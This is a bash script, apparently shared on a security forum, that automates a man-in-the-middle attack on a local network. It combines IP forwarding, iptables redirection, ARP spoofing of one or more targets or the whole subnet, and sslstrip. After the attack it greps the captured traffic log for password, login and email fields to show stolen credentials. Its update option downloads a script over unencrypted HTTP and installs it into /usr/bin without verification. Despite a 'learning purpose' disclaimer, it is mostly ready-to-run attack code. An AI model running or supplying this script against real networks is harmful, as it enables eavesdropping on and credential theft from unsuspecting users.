MATv0.6.2

1. #!/bin/bash
2. # Little bash script to launch man it the middle attack and sslstrip.
3. # version 0.6 by comaX
4. PROGNAME=$(basename $0)
5. VERSION="0.6.2"
6. #Let's define some arguments that can be passed to the script :
7. args=
8. while [ $# -ge 1 ] #check parameters
9. do
10.   case $1 in
11.     -h | --help) #define help message
12. clear
13. echo -e "You are running $0, version $VERSION.
14.  
15. usage : $0 [-h | --help] | [-u | --upadte]
16.     -h or --help : displays this help message, disclaimer and exit.
17.     -u or --update updates and installs this script
18.  
19. \033[31m DISCLAIMER :\033[m
20. This program is intended for learning purpose only. I do not condone hacking
21. and wouldn't be held responsible for you actions. Only you would face legal
22. consequences if you used this script for illegal activities.
23.  
24. \033[31m What I think should be learnt from this script :\033[m
25. This script should teach you how easy it is to steal sensitive online
26. credential and how to protect you from it, provided you understand
27. what this program does. The best way to understand what it does is
28. to look at its source. This will also teach you very basic shell script
29. programming.
30.  
31. \033[31m Changelog :\033[m
32. added in v0.6
33. -Support for multiple targets
34.  
35. added in v0.5 :
36. -Parameters for this great help message and update, more comments.
37. -Minor improvments
38.  
39. added in v0.4 :
40. -User friendly case insensitive answers (Y/y)
41. -Option to map network, retrieving live hosts and their dns names
42. -Minor improvments
43.  
44. \033[31m Credits :\033[m
45. Credits goes to all people on backtrack forums for their help and support,
46. and google for being my best friend with scripting.
47.  
48. Please criticize this program or submit ideas on the official thread at
49. http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com"
50. exit ;;
51.     -u | --update) #update program
52.         echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)"
53.         read -e proceed
54.         if [[ $proceed = "y" || $proceed = "Y" ]] ; then
55.         wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file
56.         cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin
57.         rm /tmp/mitm_update.sh #delete temp file
58.         echo -e "\033[32m Script updated ! Restarting to updated version...\033[m"
59.         sleep 3
60.         chmod +x /usr/bin/mitm #make newly installed script executable
61.         /usr/bin/mitm #launch new script
62.         else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2       
63.         fi ;;
64.     *) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;;
65.   esac
66.   shift
67. done
68.  
69. clear
70. echo -e "===========================================================================
71. =\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m =
72. =   Feel free to contribute, and distribute this script as you please.    =
73. =       Official thread : http://tiny.cc/mitmautomate         =
74. =   Check out the help (-h) to see new features and informations      =
75. =           You are running version $VERSION.             =
76. ==========================================================================="
77. echo
78. echo
79. # Starting fresh : reset ip forward and iptables
80. echo -e "\033[31m [+] Cleaning iptables \033[m"
81. echo "[-] Cleaned."
82. echo "0" > /proc/sys/net/ipv4/ip_forward
83. iptables --flush
84. iptables --table nat --flush
85. iptables --delete-chain
86. iptables --table nat --delete-chain
87.  
88. # Defining exit function and other ending features
89.  
90. cleanup() {
91. echo
92. echo "[+] Killing processes and resetting iptable."
93.  
94. kill ${sslstripid}
95. killall arpspoof
96. echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
97. iptables --flush            # there are probably too many resets here,
98. iptables --table nat --flush        # but at least we're sure everything's clean
99. iptables --delete-chain
100. iptables --table nat --delete-chain
101.  
102. echo "[+] Clean up successful..."
103. echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results
104. echo -e "\033[37m (Will be blank if no passwords were found) \033[m"
105. egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found
106. echo
107. echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)"
108. echo "If you want to keep it, it will be stored in /root/$filename.txt"
109. read -e keep
110.     if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
111.     mv /tmp/$filename.txt /root/$filename.txt #moving file
112.         if [ -f "/root/$filename.txt" ]; then #check if it exists
113.         echo "Log file copied !" #it does
114.         else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
115.         fi
116.     else rm /tmp/$filename.txt #removing temp file
117.     echo "All logs deleted"
118. fi
119. if [ -f "/usr/bin/mitm" ]; then #check if script is already installed
120.     echo
121.     echo
122.     exit 1 #if yes, exit.
123.     else
124.     echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask.
125.     read -e install
126.         if [[ $install = "Y" || $install="y" ]] ; then
127.         cp ./mitm.sh /usr/bin/mitm #copy and rename script
128.         echo -e "\033[32m Script installed !\033[m"
129.         else echo "Script not installed."
130.         fi
131.     fi
132.  
133. exit
134. }
135. ###############################End of functions#############################
136. # IP forwarding
137. echo
138. echo -e "\033[31m [+] Activating ip forwarding... \033[m"
139. echo "1" > /proc/sys/net/ipv4/ip_forward
140. echo "[-] Activated."
141.  
142. #Iptables
143. echo
144. echo -e "\033[31m [+] Configuring iptables... \033[m"
145. echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)"
146. echo
147. read -e outport
148. echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)"
149. echo
150. read -e inport
151. echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
152. iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
153. echo "[-] Traffic rerouted"
154.  
155. #Arpspoofing
156. echo
157. echo -e "\033[31m [+] Activating arpspoofing... \033[m"
158. echo
159. ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need.
160. echo
161. echo "Enter gateway ip adress (as shown above) :"
162. read -e gateway
163. echo
164. echo "What interface would you like to use ? (it should match gateway ip as shown above)"
165. read -e iface
166. echo
167. echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)"
168. read -e choicearp
169. echo
170.  
171. if [[ $choicearp = "N" || $choicearp = "n" ]] ; then
172. echo
173. echo -e "Do you want to map network to show live hosts ? (Y/N)  [This might take up to 30 secs, be patient]"
174. read -e hosts
175. echo -e "\033[31m "
176.     if [[ $hosts = "Y" || $hosts = "y" ]] ; then
177.     fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up
178.     grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts)
179.     rm /tmp/hosts.txt # remove temporary file
180.     echo -e "\033[m " # switch color back to white
181.     else echo -e "\033[m "
182. fi
183. echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m "
184. arpspoofi() {
185. xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
186.    
187. if [[ "$2" > "0" ]] ; then
188.     xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2
189.         else echo
190.     fi 
191. if [[ "$3" > "0" ]] ; then
192.     xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2
193.         else echo
194.     fi
195. if [[ "$4" > "0" ]] ; then
196.     xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2
197.     else echo
198.     fi
199. if [[ "$5" > "0" ]] ; then
200.     xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2
201.     else echo
202.     fi
203. if [[ "$6" > "0" ]] ; then
204.     xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2
205. else echo
206.     fi
207. t1=$1
208. t2=$2
209. t3=$3
210. t4=$4
211. t5=$5
212. t6=$6
213.  
214. }
215. echo "Enter ip adresses"
216. read -e parameters
217. arpspoofi $parameters
218. echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m"
219. echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m"
220.  
221. elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then
222. xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$!
223. sleep 2
224. echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m"
225. echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m"
226.  
227. else echo "Your choice is invalid. Quitting."
228. cleanup
229. fi
230.  
231.  
232. #Sslstrip
233. echo
234. echo -e "\033[31m [+] Activating sslstrip... \033[m"
235. echo  "Choose filename to output :"
236. read -e filename
237. sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file
238. sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines
239. echo
240. echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m"
241. echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ?
242. echo
243. echo -e "\033[37m Attack should be running smooth, enjoy.\033[m"
244. echo
245. echo -e "\033[33m To stop the attack, input 'quit' below :\033[m"
246. echo
247. read quitting
248. if [ $quitting = "quit" ] ; then
249.  
250. cleanup
251. else echo "Bad choice. Enter quit to stop attack"
252. read -e quitting
253. if [ $quitting = "quit" ] ; then
254. cleanup
255.  
256. else echo "Bad choice. Enter quit to stop attack"
257. read -e quitting
258. if [ $quitting = "quit" ] ; then
259. cleanup
260.  
261. else echo "Bad choice. Enter quit to stop attack"
262. read -e quitting
263. if [ $quitting = "quit" ] ; then
264. cleanup
265.  
266. else echo "Bad choice. Enter quit to stop attack"
267. echo
268. echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here
269. cleanup
270. fi
271. fi
272. fi
273. fi